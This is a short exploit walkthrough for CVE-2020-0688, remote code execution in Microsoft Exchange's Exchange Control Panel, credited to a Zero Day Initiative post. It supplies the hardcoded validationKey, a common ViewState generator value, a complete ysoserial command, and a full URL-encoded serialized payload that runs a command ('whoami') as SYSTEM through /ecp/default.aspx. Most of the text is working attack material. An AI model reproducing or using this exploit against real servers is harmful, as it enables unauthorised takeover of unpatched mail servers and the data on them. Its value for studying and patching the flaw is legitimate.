RCE in Microsoft Exchange Web Interface (CVE-2020-0688)
From Zero Day Initiative blog post.
A IIS use a validationKey and decryptionKey in the web.config file to
secure the ViewState. On an unpatched Microsoft Exchange Server, those keys are
not generated on the installation. Therefore the validationKey has always the
value CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF.
An attacker can craft a malicious signed ViewState that is going to be accepted
by the server. By nature, the ViewState is a serialized .Net object. So it's
possible to execute commands on the context of the server (SYSTEM) from the
Exchange Control Panel web application.
To exploit the vulnerability we need a valid authenticated session to collect the
ViewStateUserKey (ASP.NET_SessionId cookie) and __VIEWSTATEGENERATOR value.
It appears the __VIEWSTATEGENERATOR is often B97B4E27.
First, visit /ecp/default.aspx and collect the two values. Then use ysoserial
to generate the payload:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "<cmd>" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="<generator>" --viewstateuserkey="<ASP.NET_SessionId>" –islegacy
Finally visit the following URL:
https://<host>/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<serialized_payload>
# For example (don't forget to url-encode the payload):
https://<host>/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2fwEyvgYAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADgBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIndob2FtaSIgPC9TeXN0ZW06U3RyaW5nPg0KICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KPC9SZXNvdXJjZURpY3Rpb25hcnk+C+WQX7ojOTAExs0xHxNenDx4VyQF